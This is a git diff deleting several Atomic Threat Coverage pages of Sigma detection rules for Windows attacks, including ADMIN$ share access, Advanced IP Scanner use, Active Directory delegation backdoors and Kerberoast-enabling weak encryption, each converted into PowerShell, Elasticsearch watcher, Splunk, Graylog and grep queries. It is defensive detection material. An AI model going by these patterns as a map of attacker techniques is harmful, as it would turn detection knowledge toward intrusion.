-                  "timestamp": {
-                    "gte": "now-30m/m"
-                  }
-                }
-              }
-            }
-          }
-        },
-        "indices": [
-          "winlogbeat-*"
-        ]
-      }
-    }
-  },
-  "condition": {
-    "compare": {
-      "ctx.payload.hits.total": {
-        "not_eq": 0
-      }
-    }
-  },
-  "actions": {
-    "send_email": {
-      "throttle_period": "15m",
-      "email": {
-        "profile": "standard",
-        "from": "root@localhost",
-        "to": "root@localhost",
-        "subject": "Sigma Rule 'Admin User Remote Logon'",
-        "body": "Hits:\n{{#ctx.payload.hits.hits}}{{_source}}\n================================================================================\n{{/ctx.payload.hits.hits}}",
-        "attachments": {
-          "data.json": {
-            "data": {
-              "format": "json"
-            }
-          }
-        }
-      }
-    }
-  }
-}
-EOF
-
-```
-
-
-### graylog
-    
-```
-(EventID:"4624" AND LogonType:"10" AND AuthenticationPackageName:"Negotiate" AND AccountName.keyword:Admin\-*)
-```
-
-
-### splunk
-    
-```
-(source="WinEventLog:Security" EventCode="4624" LogonType="10" AuthenticationPackageName="Negotiate" AccountName="Admin-*")
-```
-
-
-### logpoint
-    
-```
-(event_source="Microsoft-Windows-Security-Auditing" event_id="4624" logon_type="10" AuthenticationPackageName="Negotiate" AccountName="Admin-*")
-```
-
-
-### grep
-    
-```
-grep -P '^(?:.*(?=.*4624)(?=.*10)(?=.*Negotiate)(?=.*Admin-.*))'
-```
-
-
-
diff --git a/Atomic_Threat_Coverage/Detection_Rules/win_admin_share_access.md b/Atomic_Threat_Coverage/Detection_Rules/win_admin_share_access.md
deleted file mode 100644
index 4157275..0000000
--- a/Atomic_Threat_Coverage/Detection_Rules/win_admin_share_access.md
+++ /dev/null
@@ -1,176 +0,0 @@
-| Title                    | Access to ADMIN$ Share       |
-|:-------------------------|:------------------|
-| **Description**          | Detects access to $ADMIN share |
-| **ATT&amp;CK Tactic**    |  <ul><li>[TA0008: Lateral Movement](https://attack.mitre.org/tactics/TA0008)</li></ul>  |
-| **ATT&amp;CK Technique** | <ul><li>[T1077: Windows Admin Shares](https://attack.mitre.org/techniques/T1077)</li></ul>  |
-| **Data Needed**          |  There is no documented Data Needed for this Detection Rule yet  |
-| **Trigger**              |  There is no documented Trigger for this Detection Rule yet  |
-| **Severity Level**       | low |
-| **False Positives**      | <ul><li>Legitimate administrative activity</li></ul>  |
-| **Development Status**   | experimental |
-| **References**           |  There are no documented References for this Detection Rule yet  |
-| **Author**               | Florian Roth |
-| Other Tags           | <ul><li>attack.t1021.002</li></ul> | 
-
-## Detection Rules
-
-### Sigma rule
-
-```
-title: Access to ADMIN$ Share
-id: 098d7118-55bc-4912-a836-dc6483a8d150
-description: Detects access to $ADMIN share
-tags:
-    - attack.lateral_movement
-    - attack.t1077
-    - attack.t1021.002
-status: experimental
-author: Florian Roth
-date: 2017/03/04
-logsource:
-    product: windows
-    service: security
-    definition: 'The advanced audit policy setting "Object Access > Audit File Share" must be configured for Success/Failure'
-detection:
-    selection:
-        EventID: 5140
-        ShareName: Admin$
-    filter:
-        SubjectUserName: '*$'
-    condition: selection and not filter
-falsepositives:
-    - Legitimate administrative activity
-level: low
-
-```
-
-
-
-
-
-### powershell
-    
-```
-Get-WinEvent -LogName Security | where {(($_.ID -eq "5140" -and $_.message -match "ShareName.*Admin$") -and  -not ($_.message -match "SubjectUserName.*.*$")) } | select TimeCreated,Id,RecordId,ProcessId,MachineName,Message
-```
-
-
-### es-qs
-    
-```
-(winlog.channel:"Security" AND (winlog.event_id:"5140" AND winlog.event_data.ShareName:"Admin$") AND (NOT (winlog.event_data.SubjectUserName.keyword:*$)))
-```
-
-
-### xpack-watcher
-    
-```
-curl -s -XPUT -H 'Content-Type: application/json' --data-binary @- localhost:9200/_watcher/watch/098d7118-55bc-4912-a836-dc6483a8d150 <<EOF
-{
-  "metadata": {
-    "title": "Access to ADMIN$ Share",
-    "description": "Detects access to $ADMIN share",
-    "tags": [
-      "attack.lateral_movement",
-      "attack.t1077",
-      "attack.t1021.002"
-    ],
-    "query": "(winlog.channel:\"Security\" AND (winlog.event_id:\"5140\" AND winlog.event_data.ShareName:\"Admin$\") AND (NOT (winlog.event_data.SubjectUserName.keyword:*$)))"
-  },
-  "trigger": {
-    "schedule": {
-      "interval": "30m"
-    }
-  },
-  "input": {
-    "search": {
-      "request": {
-        "body": {
-          "size": 0,
-          "query": {
-            "bool": {
-              "must": [
-                {
-                  "query_string": {
-                    "query": "(winlog.channel:\"Security\" AND (winlog.event_id:\"5140\" AND winlog.event_data.ShareName:\"Admin$\") AND (NOT (winlog.event_data.SubjectUserName.keyword:*$)))",
-                    "analyze_wildcard": true
-                  }
-                }
-              ],
-              "filter": {
-                "range": {
-                  "timestamp": {
-                    "gte": "now-30m/m"
-                  }
-                }
-              }
-            }
-          }
-        },
-        "indices": [
-          "winlogbeat-*"
-        ]
-      }
-    }
-  },
-  "condition": {
-    "compare": {
-      "ctx.payload.hits.total": {
-        "not_eq": 0
-      }
-    }
-  },
-  "actions": {
-    "send_email": {
-      "throttle_period": "15m",
-      "email": {
-        "profile": "standard",
-        "from": "root@localhost",
-        "to": "root@localhost",
-        "subject": "Sigma Rule 'Access to ADMIN$ Share'",
-        "body": "Hits:\n{{#ctx.payload.hits.hits}}{{_source}}\n================================================================================\n{{/ctx.payload.hits.hits}}",
-        "attachments": {
-          "data.json": {
-            "data": {
-              "format": "json"
-            }
-          }
-        }
-      }
-    }
-  }
-}
-EOF
-
-```
-
-
-### graylog
-    
-```
-((EventID:"5140" AND ShareName:"Admin$") AND (NOT (SubjectUserName.keyword:*$)))
-```
-
-
-### splunk
-    
-```
-(source="WinEventLog:Security" (EventCode="5140" ShareName="Admin$") NOT (SubjectUserName="*$"))
-```
-
-
-### logpoint
-    
-```
-(event_source="Microsoft-Windows-Security-Auditing" (event_id="5140" ShareName="Admin$")  -(SubjectUserName="*$"))
-```
-
-
-### grep
-    
-```
-grep -P '^(?:.*(?=.*(?:.*(?=.*5140)(?=.*Admin\$)))(?=.*(?!.*(?:.*(?=.*.*\$)))))'
-```
-
-
-
diff --git a/Atomic_Threat_Coverage/Detection_Rules/win_advanced_ip_scanner.md b/Atomic_Threat_Coverage/Detection_Rules/win_advanced_ip_scanner.md
deleted file mode 100644
index 3f25a18..0000000
--- a/Atomic_Threat_Coverage/Detection_Rules/win_advanced_ip_scanner.md
+++ /dev/null
@@ -1,173 +0,0 @@
-| Title                    | Advanced IP Scanner       |
-|:-------------------------|:------------------|
-| **Description**          | Detects the use of Advanced IP Scanner. Seems to be a popular tool for ransomware groups. |
-| **ATT&amp;CK Tactic**    |  <ul><li>[TA0007: Discovery](https://attack.mitre.org/tactics/TA0007)</li></ul>  |
-| **ATT&amp;CK Technique** | <ul><li>[T1046: Network Service Scanning](https://attack.mitre.org/techniques/T1046)</li></ul>  |
-| **Data Needed**          | <ul><li>[DN0001_4688_windows_process_creation](../Data_Needed/DN0001_4688_windows_process_creation.md)</li><li>[DN0002_4688_windows_process_creation_with_commandline](../Data_Needed/DN0002_4688_windows_process_creation_with_commandline.md)</li><li>[DN0003_1_windows_sysmon_process_creation](../Data_Needed/DN0003_1_windows_sysmon_process_creation.md)</li></ul>  |
-| **Trigger**              | <ul><li>[T1046: Network Service Scanning](../Triggers/T1046.md)</li></ul>  |
-| **Severity Level**       | medium |
-| **False Positives**      | <ul><li>Legitimate administrative use</li></ul>  |
-| **Development Status**   | experimental |
-| **References**           | <ul><li>[https://news.sophos.com/en-us/2019/12/09/snatch-ransomware-reboots-pcs-into-safe-mode-to-bypass-protection/](https://news.sophos.com/en-us/2019/12/09/snatch-ransomware-reboots-pcs-into-safe-mode-to-bypass-protection/)</li><li>[https://www.fireeye.com/blog/threat-research/2020/05/tactics-techniques-procedures-associated-with-maze-ransomware-incidents.html](https://www.fireeye.com/blog/threat-research/2020/05/tactics-techniques-procedures-associated-with-maze-ransomware-incidents.html)</li></ul>  |
-| **Author**               | @ROxPinTeddy |
-
-
-## Detection Rules
-
-### Sigma rule
-
-```
-title: Advanced IP Scanner 
-id: bef37fa2-f205-4a7b-b484-0759bfd5f86f
-status: experimental
-description: Detects the use of Advanced IP Scanner. Seems to be a popular tool for ransomware groups.
-references:
-    - https://news.sophos.com/en-us/2019/12/09/snatch-ransomware-reboots-pcs-into-safe-mode-to-bypass-protection/
-    - https://www.fireeye.com/blog/threat-research/2020/05/tactics-techniques-procedures-associated-with-maze-ransomware-incidents.html
-author: '@ROxPinTeddy'
-date: 2020/05/12
-tags:
-    - attack.discovery
-    - attack.t1046
-logsource:
-    category: process_creation
-    product: windows
-detection:
-    selection:
-       Image|contains: '\advanced_ip_scanner'
-    condition: selection
-falsepositives:
-    - Legitimate administrative use
-level: medium
-
-```
-
-
-
-
-
-### powershell
-    
-```
-Get-WinEvent -LogName Microsoft-Windows-Sysmon/Operational | where {($_.ID -eq "1" -and $_.message -match "Image.*.*\\advanced_ip_scanner.*") } | select TimeCreated,Id,RecordId,ProcessId,MachineName,Message
-```
-
-
-### es-qs
-    
-```
-winlog.event_data.Image.keyword:*\\advanced_ip_scanner*
-```
-
-
-### xpack-watcher
-    
-```
-curl -s -XPUT -H 'Content-Type: application/json' --data-binary @- localhost:9200/_watcher/watch/bef37fa2-f205-4a7b-b484-0759bfd5f86f <<EOF
-{
-  "metadata": {
-    "title": "Advanced IP Scanner",
-    "description": "Detects the use of Advanced IP Scanner. Seems to be a popular tool for ransomware groups.",
-    "tags": [
-      "attack.discovery",
-      "attack.t1046"
-    ],
-    "query": "winlog.event_data.Image.keyword:*\\\\advanced_ip_scanner*"
-  },
-  "trigger": {
-    "schedule": {
-      "interval": "30m"
-    }
-  },
-  "input": {
-    "search": {
-      "request": {
-        "body": {
-          "size": 0,
-          "query": {
-            "bool": {
-              "must": [
-                {
-                  "query_string": {
-                    "query": "winlog.event_data.Image.keyword:*\\\\advanced_ip_scanner*",
-                    "analyze_wildcard": true
-                  }
-                }
-              ],
-              "filter": {
-                "range": {
-                  "timestamp": {
-                    "gte": "now-30m/m"
-                  }
-                }
-              }
-            }
-          }
-        },
-        "indices": [
-          "winlogbeat-*"
-        ]
-      }
-    }
-  },
-  "condition": {
-    "compare": {
-      "ctx.payload.hits.total": {
-        "not_eq": 0
-      }
-    }
-  },
-  "actions": {
-    "send_email": {
-      "throttle_period": "15m",
-      "email": {
-        "profile": "standard",
-        "from": "root@localhost",
-        "to": "root@localhost",
-        "subject": "Sigma Rule 'Advanced IP Scanner'",
-        "body": "Hits:\n{{#ctx.payload.hits.hits}}{{_source}}\n================================================================================\n{{/ctx.payload.hits.hits}}",
-        "attachments": {
-          "data.json": {
-            "data": {
-              "format": "json"
-            }
-          }
-        }
-      }
-    }
-  }
-}
-EOF
-
-```
-
-
-### graylog
-    
-```
-Image.keyword:*\\advanced_ip_scanner*
-```
-
-
-### splunk
-    
-```
-Image="*\\advanced_ip_scanner*"
-```
-
-
-### logpoint
-    
-```
-(event_id="1" Image="*\\advanced_ip_scanner*")
-```
-
-
-### grep
-    
-```
-grep -P '^.*\advanced_ip_scanner.*'
-```
-
-
-
diff --git a/Atomic_Threat_Coverage/Detection_Rules/win_alert_active_directory_user_control.md b/Atomic_Threat_Coverage/Detection_Rules/win_alert_active_directory_user_control.md
deleted file mode 100644
index b38add3..0000000
--- a/Atomic_Threat_Coverage/Detection_Rules/win_alert_active_directory_user_control.md
+++ /dev/null
@@ -1,175 +0,0 @@
-| Title                    | Enabled User Right in AD to Control User Objects       |
-|:-------------------------|:------------------|
-| **Description**          | Detects scenario where if a user is assigned the SeEnableDelegationPrivilege right in Active Directory it would allow control of other AD user objects. |
-| **ATT&amp;CK Tactic**    |  <ul><li>[TA0004: Privilege Escalation](https://attack.mitre.org/tactics/TA0004)</li></ul>  |
-| **ATT&amp;CK Technique** | <ul><li>[T1078: Valid Accounts](https://attack.mitre.org/techniques/T1078)</li></ul>  |
-| **Data Needed**          |  There is no documented Data Needed for this Detection Rule yet  |
-| **Trigger**              |  There is no documented Trigger for this Detection Rule yet  |
-| **Severity Level**       | high |
-| **False Positives**      | <ul><li>Unknown</li></ul>  |
-| **Development Status**   |  Development Status wasn't defined for this Detection Rule yet  |
-| **References**           | <ul><li>[https://www.harmj0y.net/blog/activedirectory/the-most-dangerous-user-right-you-probably-have-never-heard-of/](https://www.harmj0y.net/blog/activedirectory/the-most-dangerous-user-right-you-probably-have-never-heard-of/)</li></ul>  |
-| **Author**               | @neu5ron |
-
-
-## Detection Rules
-
-### Sigma rule
-
-```
-title: Enabled User Right in AD to Control User Objects
-id: 311b6ce2-7890-4383-a8c2-663a9f6b43cd
-description: Detects scenario where if a user is assigned the SeEnableDelegationPrivilege right in Active Directory it would allow control of other AD user objects.
-tags:
-    - attack.privilege_escalation
-    - attack.t1078
-references:
-    - https://www.harmj0y.net/blog/activedirectory/the-most-dangerous-user-right-you-probably-have-never-heard-of/
-author: '@neu5ron'
-date: 2017/07/30
-logsource:
-    product: windows
-    service: security
-    definition: 'Requirements: Audit Policy : Policy Change > Audit Authorization Policy Change, Group Policy : Computer Configuration\Windows Settings\Security Settings\Advanced Audit Policy Configuration\Audit Policies\Policy Change\Audit Authorization Policy Change'
-detection:
-    selection:
-        EventID: 4704
-    keywords:
-        Message:
-            - '*SeEnableDelegationPrivilege*'
-    condition: all of them
-falsepositives:
-    - Unknown
-level: high
-
-```
-
-
-
-
-
-### powershell
-    
-```
-Get-WinEvent -LogName Security | where {($_.ID -eq "4704" -and ($_.message -match "Message.*.*SeEnableDelegationPrivilege.*")) } | select TimeCreated,Id,RecordId,ProcessId,MachineName,Message
-```
-
-
-### es-qs
-    
-```
-(winlog.channel:"Security" AND winlog.event_id:"4704" AND Message.keyword:(*SeEnableDelegationPrivilege*))
-```
-
-
-### xpack-watcher
-    
-```
-curl -s -XPUT -H 'Content-Type: application/json' --data-binary @- localhost:9200/_watcher/watch/311b6ce2-7890-4383-a8c2-663a9f6b43cd <<EOF
-{
-  "metadata": {
-    "title": "Enabled User Right in AD to Control User Objects",
-    "description": "Detects scenario where if a user is assigned the SeEnableDelegationPrivilege right in Active Directory it would allow control of other AD user objects.",
-    "tags": [
-      "attack.privilege_escalation",
-      "attack.t1078"
-    ],
-    "query": "(winlog.channel:\"Security\" AND winlog.event_id:\"4704\" AND Message.keyword:(*SeEnableDelegationPrivilege*))"
-  },
-  "trigger": {
-    "schedule": {
-      "interval": "30m"
-    }
-  },
-  "input": {
-    "search": {
-      "request": {
-        "body": {
-          "size": 0,
-          "query": {
-            "bool": {
-              "must": [
-                {
-                  "query_string": {
-                    "query": "(winlog.channel:\"Security\" AND winlog.event_id:\"4704\" AND Message.keyword:(*SeEnableDelegationPrivilege*))",
-                    "analyze_wildcard": true
-                  }
-                }
-              ],
-              "filter": {
-                "range": {
-                  "timestamp": {
-                    "gte": "now-30m/m"
-                  }
-                }
-              }
-            }
-          }
-        },
-        "indices": [
-          "winlogbeat-*"
-        ]
-      }
-    }
-  },
-  "condition": {
-    "compare": {
-      "ctx.payload.hits.total": {
-        "not_eq": 0
-      }
-    }
-  },
-  "actions": {
-    "send_email": {
-      "throttle_period": "15m",
-      "email": {
-        "profile": "standard",
-        "from": "root@localhost",
-        "to": "root@localhost",
-        "subject": "Sigma Rule 'Enabled User Right in AD to Control User Objects'",
-        "body": "Hits:\n{{#ctx.payload.hits.hits}}{{_source}}\n================================================================================\n{{/ctx.payload.hits.hits}}",
-        "attachments": {
-          "data.json": {
-            "data": {
-              "format": "json"
-            }
-          }
-        }
-      }
-    }
-  }
-}
-EOF
-
-```
-
-
-### graylog
-    
-```
-(EventID:"4704" AND Message.keyword:(*SeEnableDelegationPrivilege*))
-```
-
-
-### splunk
-    
-```
-(source="WinEventLog:Security" EventCode="4704" (Message="*SeEnableDelegationPrivilege*"))
-```
-
-
-### logpoint
-    
-```
-(event_source="Microsoft-Windows-Security-Auditing" event_id="4704" Message IN ["*SeEnableDelegationPrivilege*"])
-```
-
-
-### grep
-    
-```
-grep -P '^(?:.*(?=.*4704)(?=.*(?:.*.*SeEnableDelegationPrivilege.*)))'
-```
-
-
-
diff --git a/Atomic_Threat_Coverage/Detection_Rules/win_alert_ad_user_backdoors.md b/Atomic_Threat_Coverage/Detection_Rules/win_alert_ad_user_backdoors.md
deleted file mode 100644
index f4b8022..0000000
--- a/Atomic_Threat_Coverage/Detection_Rules/win_alert_ad_user_backdoors.md
+++ /dev/null
@@ -1,191 +0,0 @@
-| Title                    | Active Directory User Backdoors       |
-|:-------------------------|:------------------|
-| **Description**          | Detects scenarios where one can control another users or computers account without having to use their credentials. |
-| **ATT&amp;CK Tactic**    |  <ul><li>[TA0006: Credential Access](https://attack.mitre.org/tactics/TA0006)</li><li>[TA0003: Persistence](https://attack.mitre.org/tactics/TA0003)</li></ul>  |
-| **ATT&amp;CK Technique** | <ul><li>[T1098: Account Manipulation](https://attack.mitre.org/techniques/T1098)</li></ul>  |
-| **Data Needed**          |  There is no documented Data Needed for this Detection Rule yet  |
-| **Trigger**              | <ul><li>[T1098: Account Manipulation](../Triggers/T1098.md)</li></ul>  |
-| **Severity Level**       | high |
-| **False Positives**      | <ul><li>Unknown</li></ul>  |
-| **Development Status**   |  Development Status wasn't defined for this Detection Rule yet  |
-| **References**           | <ul><li>[https://msdn.microsoft.com/en-us/library/cc220234.aspx](https://msdn.microsoft.com/en-us/library/cc220234.aspx)</li><li>[https://adsecurity.org/?p=3466](https://adsecurity.org/?p=3466)</li><li>[https://www.harmj0y.net/blog/redteaming/another-word-on-delegation/](https://www.harmj0y.net/blog/redteaming/another-word-on-delegation/)</li></ul>  |
-| **Author**               | @neu5ron |
-
-
-## Detection Rules
-
-### Sigma rule
-
-```
-title: Active Directory User Backdoors
-id: 300bac00-e041-4ee2-9c36-e262656a6ecc
-description: Detects scenarios where one can control another users or computers account without having to use their credentials.
-references:
-    - https://msdn.microsoft.com/en-us/library/cc220234.aspx
-    - https://adsecurity.org/?p=3466
-    - https://www.harmj0y.net/blog/redteaming/another-word-on-delegation/
-author: '@neu5ron'
-date: 2017/04/13
-tags:
-    - attack.t1098
-    - attack.credential_access
-    - attack.persistence
-logsource:
-    product: windows
-    service: security
-    definition1: 'Requirements: Audit Policy : Account Management > Audit User Account Management, Group Policy : Computer Configuration\Windows Settings\Security Settings\Advanced Audit Policy Configuration\Audit Policies\Account Management\Audit User Account Management'
-    definition2: 'Requirements: Audit Policy : DS Access > Audit Directory Service Changes, Group Policy : Computer Configuration\Windows Settings\Security Settings\Advanced Audit Policy Configuration\Audit Policies\DS Access\Audit Directory Service Changes'
-detection:
-    selection1:
-        EventID: 4738
-    filter_null:
-        AllowedToDelegateTo: null
-    filter1:
-        AllowedToDelegateTo: '-'
-    selection2:
-        EventID: 5136
-        AttributeLDAPDisplayName: 'msDS-AllowedToDelegateTo'
-    selection3:
-        EventID: 5136
-        ObjectClass: 'user'
-        AttributeLDAPDisplayName: 'servicePrincipalName'
-    selection4:
-        EventID: 5136
-        AttributeLDAPDisplayName: 'msDS-AllowedToActOnBehalfOfOtherIdentity'
-    condition: (selection1 and not filter1 and not filter_null) or selection2 or selection3 or selection4
-falsepositives:
-    - Unknown
-level: high
-
-```
-
-
-
-
-
-### powershell
-    
-```
-Get-WinEvent -LogName Security | where {(((((($_.ID -eq "4738" -and  -not ($_.message -match "AllowedToDelegateTo.*-")) -and  -not (-not AllowedToDelegateTo="*")) -or ($_.ID -eq "5136" -and $_.message -match "AttributeLDAPDisplayName.*msDS-AllowedToDelegateTo")) -or ($_.ID -eq "5136" -and $_.message -match "ObjectClass.*user" -and $_.message -match "AttributeLDAPDisplayName.*servicePrincipalName")) -or ($_.ID -eq "5136" -and $_.message -match "AttributeLDAPDisplayName.*msDS-AllowedToActOnBehalfOfOtherIdentity"))) } | select TimeCreated,Id,RecordId,ProcessId,MachineName,Message
-```
-
-
-### es-qs
-    
-```
-(winlog.channel:"Security" AND ((((winlog.channel:"Security" AND (winlog.event_id:"4738" AND (NOT (winlog.event_data.AllowedToDelegateTo:"\-"))) AND (NOT (NOT _exists_:winlog.event_data.AllowedToDelegateTo))) OR (winlog.event_id:"5136" AND winlog.event_data.AttributeLDAPDisplayName:"msDS\-AllowedToDelegateTo")) OR (winlog.event_id:"5136" AND winlog.event_data.ObjectClass:"user" AND winlog.event_data.AttributeLDAPDisplayName:"servicePrincipalName")) OR (winlog.event_id:"5136" AND winlog.event_data.AttributeLDAPDisplayName:"msDS\-AllowedToActOnBehalfOfOtherIdentity")))
-```
-
-
-### xpack-watcher
-    
-```
-curl -s -XPUT -H 'Content-Type: application/json' --data-binary @- localhost:9200/_watcher/watch/300bac00-e041-4ee2-9c36-e262656a6ecc <<EOF
-{
-  "metadata": {
-    "title": "Active Directory User Backdoors",
-    "description": "Detects scenarios where one can control another users or computers account without having to use their credentials.",
-    "tags": [
-      "attack.t1098",
-      "attack.credential_access",
-      "attack.persistence"
-    ],
-    "query": "(winlog.channel:\"Security\" AND ((((winlog.channel:\"Security\" AND (winlog.event_id:\"4738\" AND (NOT (winlog.event_data.AllowedToDelegateTo:\"\\-\"))) AND (NOT (NOT _exists_:winlog.event_data.AllowedToDelegateTo))) OR (winlog.event_id:\"5136\" AND winlog.event_data.AttributeLDAPDisplayName:\"msDS\\-AllowedToDelegateTo\")) OR (winlog.event_id:\"5136\" AND winlog.event_data.ObjectClass:\"user\" AND winlog.event_data.AttributeLDAPDisplayName:\"servicePrincipalName\")) OR (winlog.event_id:\"5136\" AND winlog.event_data.AttributeLDAPDisplayName:\"msDS\\-AllowedToActOnBehalfOfOtherIdentity\")))"
-  },
-  "trigger": {
-    "schedule": {
-      "interval": "30m"
-    }
-  },
-  "input": {
-    "search": {
-      "request": {
-        "body": {
-          "size": 0,
-          "query": {
-            "bool": {
-              "must": [
-                {
-                  "query_string": {
-                    "query": "(winlog.channel:\"Security\" AND ((((winlog.channel:\"Security\" AND (winlog.event_id:\"4738\" AND (NOT (winlog.event_data.AllowedToDelegateTo:\"\\-\"))) AND (NOT (NOT _exists_:winlog.event_data.AllowedToDelegateTo))) OR (winlog.event_id:\"5136\" AND winlog.event_data.AttributeLDAPDisplayName:\"msDS\\-AllowedToDelegateTo\")) OR (winlog.event_id:\"5136\" AND winlog.event_data.ObjectClass:\"user\" AND winlog.event_data.AttributeLDAPDisplayName:\"servicePrincipalName\")) OR (winlog.event_id:\"5136\" AND winlog.event_data.AttributeLDAPDisplayName:\"msDS\\-AllowedToActOnBehalfOfOtherIdentity\")))",
-                    "analyze_wildcard": true
-                  }
-                }
-              ],
-              "filter": {
-                "range": {
-                  "timestamp": {
-                    "gte": "now-30m/m"
-                  }
-                }
-              }
-            }
-          }
-        },
-        "indices": [
-          "winlogbeat-*"
-        ]
-      }
-    }
-  },
-  "condition": {
-    "compare": {
-      "ctx.payload.hits.total": {
-        "not_eq": 0
-      }
-    }
-  },
-  "actions": {
-    "send_email": {
-      "throttle_period": "15m",
-      "email": {
-        "profile": "standard",
-        "from": "root@localhost",
-        "to": "root@localhost",
-        "subject": "Sigma Rule 'Active Directory User Backdoors'",
-        "body": "Hits:\n{{#ctx.payload.hits.hits}}{{_source}}\n================================================================================\n{{/ctx.payload.hits.hits}}",
-        "attachments": {
-          "data.json": {
-            "data": {
-              "format": "json"
-            }
-          }
-        }
-      }
-    }
-  }
-}
-EOF
-
-```
-
-
-### graylog
-    
-```
-(((((EventID:"4738" AND (NOT (AllowedToDelegateTo:"\-"))) AND (NOT (NOT _exists_:AllowedToDelegateTo))) OR (EventID:"5136" AND AttributeLDAPDisplayName:"msDS\-AllowedToDelegateTo")) OR (EventID:"5136" AND ObjectClass:"user" AND AttributeLDAPDisplayName:"servicePrincipalName")) OR (EventID:"5136" AND AttributeLDAPDisplayName:"msDS\-AllowedToActOnBehalfOfOtherIdentity"))
-```
-
-
-### splunk
-    
-```
-(source="WinEventLog:Security" ((((source="WinEventLog:Security" (EventCode="4738" NOT (AllowedToDelegateTo="-")) NOT (NOT AllowedToDelegateTo="*")) OR (EventCode="5136" AttributeLDAPDisplayName="msDS-AllowedToDelegateTo")) OR (EventCode="5136" ObjectClass="user" AttributeLDAPDisplayName="servicePrincipalName")) OR (EventCode="5136" AttributeLDAPDisplayName="msDS-AllowedToActOnBehalfOfOtherIdentity")))
-```
-
-
-### logpoint
-    
-```
-(event_source="Microsoft-Windows-Security-Auditing" ((((event_source="Microsoft-Windows-Security-Auditing" (event_id="4738"  -(AllowedToDelegateTo="-"))  -(-AllowedToDelegateTo=*)) OR (event_id="5136" AttributeLDAPDisplayName="msDS-AllowedToDelegateTo")) OR (event_id="5136" ObjectClass="user" AttributeLDAPDisplayName="servicePrincipalName")) OR (event_id="5136" AttributeLDAPDisplayName="msDS-AllowedToActOnBehalfOfOtherIdentity")))
-```
-
-
-### grep
-    
-```
-grep -P '^(?:.*(?:.*(?:.*(?:.*(?:.*(?:.*(?:.*(?=.*(?:.*(?=.*4738)(?=.*(?!.*(?:.*(?=.*-))))))(?=.*(?!.*(?:.*(?=.*(?!AllowedToDelegateTo))))))|.*(?:.*(?=.*5136)(?=.*msDS-AllowedToDelegateTo))))|.*(?:.*(?=.*5136)(?=.*user)(?=.*servicePrincipalName))))|.*(?:.*(?=.*5136)(?=.*msDS-AllowedToActOnBehalfOfOtherIdentity))))'
-```
-
-
-
diff --git a/Atomic_Threat_Coverage/Detection_Rules/win_alert_enable_weak_encryption.md b/Atomic_Threat_Coverage/Detection_Rules/win_alert_enable_weak_encryption.md
deleted file mode 100644
index f31ad9e..0000000
--- a/Atomic_Threat_Coverage/Detection_Rules/win_alert_enable_weak_encryption.md
+++ /dev/null
@@ -1,183 +0,0 @@
-| Title                    | Weak Encryption Enabled and Kerberoast       |
-|:-------------------------|:------------------|
-| **Description**          | Detects scenario where weak encryption is enabled for a user profile which could be used for hash/password cracking. |
-| **ATT&amp;CK Tactic**    |  <ul><li>[TA0005: Defense Evasion](https://attack.mitre.org/tactics/TA0005)</li></ul>  |
-| **ATT&amp;CK Technique** | <ul><li>[T1089: Disabling Security Tools](https://attack.mitre.org/techniques/T1089)</li></ul>  |
-| **Data Needed**          |  There is no documented Data Needed for this Detection Rule yet  |
-| **Trigger**              |  There is no documented Trigger for this Detection Rule yet  |
-| **Severity Level**       | high |
-| **False Positives**      | <ul><li>Unknown</li></ul>  |
-| **Development Status**   |  Development Status wasn't defined for this Detection Rule yet  |
-| **References**           | <ul><li>[https://adsecurity.org/?p=2053](https://adsecurity.org/?p=2053)</li><li>[https://www.harmj0y.net/blog/activedirectory/roasting-as-reps/](https://www.harmj0y.net/blog/activedirectory/roasting-as-reps/)</li></ul>  |
-| **Author**               | @neu5ron |
-| Other Tags           | <ul><li>attack.t1562.001</li></ul> | 
-
-## Detection Rules
-
-### Sigma rule
-
-```
-title: Weak Encryption Enabled and Kerberoast
-id: f6de9536-0441-4b3f-a646-f4e00f300ffd
-description: Detects scenario where weak encryption is enabled for a user profile which could be used for hash/password cracking.
-references:
-    - https://adsecurity.org/?p=2053
-    - https://www.harmj0y.net/blog/activedirectory/roasting-as-reps/
-author: '@neu5ron'
-date: 2017/07/30
-tags:
-    - attack.defense_evasion
-    - attack.t1089
-    - attack.t1562.001
-logsource:
-    product: windows
-    service: security
-    definition: 'Requirements: Audit Policy : Account Management > Audit User Account Management, Group Policy : Computer Configuration\Windows Settings\Security Settings\Advanced Audit Policy Configuration\Audit Policies\Account Management\Audit User Account Management'
-detection:
-    selection:
-        EventID: 4738
-    keywords:
-        Message:
-            - '*DES*'
-            - '*Preauth*'
-            - '*Encrypted*'
-    filters:
-        Message:
-            - '*Enabled*'
-    condition: selection and keywords and filters
-falsepositives:
-    - Unknown
-level: high
-
-```
-
-
-
-
-
-### powershell
-    
-```
-Get-WinEvent -LogName Security | where {($_.ID -eq "4738" -and ($_.message -match "Message.*.*DES.*" -or $_.message -match "Message.*.*Preauth.*" -or $_.message -match "Message.*.*Encrypted.*") -and ($_.message -match "Message.*.*Enabled.*")) } | select TimeCreated,Id,RecordId,ProcessId,MachineName,Message
-```
-
-
-### es-qs
-    
-```
-(winlog.channel:"Security" AND winlog.event_id:"4738" AND Message.keyword:(*DES* OR *Preauth* OR *Encrypted*) AND Message.keyword:(*Enabled*))
-```
-
-
-### xpack-watcher
-    
-```
-curl -s -XPUT -H 'Content-Type: application/json' --data-binary @- localhost:9200/_watcher/watch/f6de9536-0441-4b3f-a646-f4e00f300ffd <<EOF
-{
-  "metadata": {
-    "title": "Weak Encryption Enabled and Kerberoast",
-    "description": "Detects scenario where weak encryption is enabled for a user profile which could be used for hash/password cracking.",
-    "tags": [
-      "attack.defense_evasion",
-      "attack.t1089",
-      "attack.t1562.001"
-    ],
-    "query": "(winlog.channel:\"Security\" AND winlog.event_id:\"4738\" AND Message.keyword:(*DES* OR *Preauth* OR *Encrypted*) AND Message.keyword:(*Enabled*))"
-  },
-  "trigger": {
-    "schedule": {
-      "interval": "30m"
-    }
-  },
-  "input": {
-    "search": {
-      "request": {
-        "body": {
-          "size": 0,
-          "query": {
-            "bool": {
-              "must": [
-                {
-                  "query_string": {
-                    "query": "(winlog.channel:\"Security\" AND winlog.event_id:\"4738\" AND Message.keyword:(*DES* OR *Preauth* OR *Encrypted*) AND Message.keyword:(*Enabled*))",
-                    "analyze_wildcard": true
-                  }
-                }
-              ],
-              "filter": {
-                "range": {
-                  "timestamp": {
-                    "gte": "now-30m/m"
-                  }
-                }
-              }
-            }
-          }
-        },
-        "indices": [
-          "winlogbeat-*"
-        ]
-      }
-    }
-  },
-  "condition": {
-    "compare": {
-      "ctx.payload.hits.total": {
-        "not_eq": 0
-      }
-    }
-  },
-  "actions": {
-    "send_email": {
-      "throttle_period": "15m",
-      "email": {
-        "profile": "standard",
-        "from": "root@localhost",
